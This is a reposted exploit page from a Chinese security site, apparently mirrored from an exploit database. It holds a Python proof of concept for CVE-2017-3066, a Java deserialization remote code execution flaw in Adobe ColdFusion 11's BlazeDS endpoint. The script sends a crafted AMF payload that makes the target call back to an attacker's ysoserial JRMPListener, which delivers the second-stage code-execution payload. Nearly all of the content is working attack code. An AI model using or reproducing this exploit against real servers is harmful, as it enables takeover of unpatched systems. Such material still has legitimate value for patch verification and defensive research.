首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Cod
来源:https://depthsecurity.com 作者:Tameesh 发布时间:2018-02-08  
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote
 
# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary payload for RCE.
 
import struct
import sys
import requests
 
if len(sys.argv) != 5:
    print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
    quit()
 
target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]
 
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
              '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
              struct.pack('>I', int(callback_port)) + \
              '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
 
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Asterisk 13.17.2 - 'chan_skinn
·Herospeed - 'TelnetSwitch' Rem
·MalwareFox AntiMalware 2.74.0.
·Cisco ASA - Crash PoC
·Geovision Inc. IP Camera & Vid
·Geovision Inc. IP Camera/Video
·Hava Tahmin 1.0 Database Discl
·Hazir Site 2.2 Database Disclo
·Gateway 1.0 Database Disclosur
·iPortalx Portal Scripti Databa
·BOCHS 2.6-5 - Buffer Overflow
·MalwareFox AntiMalware 2.74.0.
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved